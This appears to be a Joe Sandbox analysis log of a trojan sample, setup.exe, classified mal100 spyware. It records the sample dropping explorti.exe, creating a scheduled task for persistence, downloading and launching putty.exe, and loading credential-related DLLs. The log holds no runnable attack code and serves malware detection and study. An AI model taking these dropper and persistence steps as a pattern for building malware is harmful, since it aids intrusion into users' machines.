Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D11000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649453567.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D11000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/l9
Source: explorti.exe, 00000005.00000003.2628023359.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961055288.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe
Source: explorti.exe, 00000005.00000003.2649453567.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exeFq
Source: explorti.exe, 00000005.00000003.2627885142.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2628023359.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exeM
Source: explorti.exe, 00000005.00000003.2649453567.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exeg
Source: explorti.exe, 00000005.00000003.2649453567.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2627885142.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000002.2985899383.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2628023359.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961055288.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exev
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D11000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000002.2985625138.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe6789
Source: explorti.exe, 00000005.00000003.2627885142.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exeNa
Source: explorti.exe, 00000005.00000002.2985625138.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exes.dll.
Source: putty.exe, putty.exe, 00000007.00000003.2654638923.0000000003E11000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 00000007.00000000.2653144944.0000000000C69000.00000002.00000001.01000000.00000009.sdmp, putty.exe, 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443

Source: unknown

HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49760 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00BA6150 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,

7_2_00BA6150

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BA6150 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,		7_2_00BA6150
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BA7490 WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalLock,GlobalLock,WideCharToMultiByte,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,GlobalFree,GlobalFree,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,GlobalFree,GlobalFree,GlobalFree,SendMessageA,		7_2_00BA7490

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00BA9D30 OpenClipboard,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,

7_2_00BA9D30

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00BA1130 RealizePalette,UpdateColors,RealizePalette,UpdateColors,GetKeyboardState,ScreenToClient,GetKeyboardState,DefWindowProcW,

7_2_00BA1130

System Summary

PE file contains section with special chars

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_002C3068	5_2_002C3068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_00284CF0	5_2_00284CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_002B7D83	5_2_002B7D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_002C765B	5_2_002C765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_00284AF0	5_2_00284AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_002C8720	5_2_002C8720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_002C6F09	5_2_002C6F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_002C777B	5_2_002C777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_002C2BD0	5_2_002C2BD0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BB2070	7_2_00BB2070
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BCA1F0	7_2_00BCA1F0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BA1130	7_2_00BA1130
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BBA2E0	7_2_00BBA2E0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C4839B	7_2_00C4839B
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BA7490	7_2_00BA7490
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BC2470	7_2_00BC2470
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BC0580	7_2_00BC0580
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C0C530	7_2_00C0C530
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BB6630	7_2_00BB6630
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BB2070	7_2_00BB2070
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BDB790	7_2_00BDB790
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BBE7C0	7_2_00BBE7C0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C0F710	7_2_00C0F710
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C09840	7_2_00C09840
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BA8920	7_2_00BA8920
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C0BA80	7_2_00C0BA80
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C2EA90	7_2_00C2EA90
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C47A40	7_2_00C47A40
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BDAA30	7_2_00BDAA30
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C0EA70	7_2_00C0EA70
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C3CCF0	7_2_00C3CCF0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C40CF0	7_2_00C40CF0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BC0CE0	7_2_00BC0CE0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C0ACA0	7_2_00C0ACA0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C35C30	7_2_00C35C30
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BA9D80	7_2_00BA9D80
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C44D17	7_2_00C44D17
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BAFE10	7_2_00BAFE10
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BA1E56	7_2_00BA1E56
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C3DE30	7_2_00C3DE30
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BBAF90	7_2_00BBAF90
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C04FF0	7_2_00C04FF0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BACFE0	7_2_00BACFE0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C43F44	7_2_00C43F44

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\putty[1].exe 4A38DB0744930E1F5BFC0A82F63C907F7DC94270B930A3950E6A0ABBC903C47F
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe 4A38DB0744930E1F5BFC0A82F63C907F7DC94270B930A3950E6A0ABBC903C47F

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00BE91A0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00BE9AA0 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00BE8DB0 appears 87 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00BE8C60 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00BDEF00 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00BC56D0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00BD3F60 appears 150 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00BD9340 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00C406F0 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00C4F403 appears 387 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00BD8D90 appears 105 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00C08520 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00BD4030 appears 78 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00C08510 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: String function: 00C09C90 appears 62 times

Source: setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: setup.exe	Static PE information: Section: ZLIB complexity 0.9997705344945356
Source: setup.exe	Static PE information: Section: sgwszepm ZLIB complexity 0.9946038471758275
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9997705344945356
Source: explorti.exe.0.dr	Static PE information: Section: sgwszepm ZLIB complexity 0.9946038471758275

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/5@1/2

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00BDD3E0 FormatMessageA,_strlen,GetLastError,

7_2_00BDD3E0

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00BC4400 CoCreateInstance,

7_2_00BC4400

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00BAB280 GetProcAddress,FreeLibrary,FindResourceA,SizeofResource,LoadResource,LockResource,

7_2_00BAB280

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\putty[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: setup.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: putty.exe	String found in binary or memory: config-serial-stopbits
Source: putty.exe	String found in binary or memory: source-address
Source: putty.exe	String found in binary or memory: config-address-family
Source: putty.exe	String found in binary or memory: config-ssh-portfwd-address-family

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\user\Desktop\setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe "C:\Users\user\AppData\Local\Temp\1000009001\putty.exe"
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe "C:\Users\user\AppData\Local\Temp\1000009001\putty.exe"	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: gpapi.dll	Jump to behavior
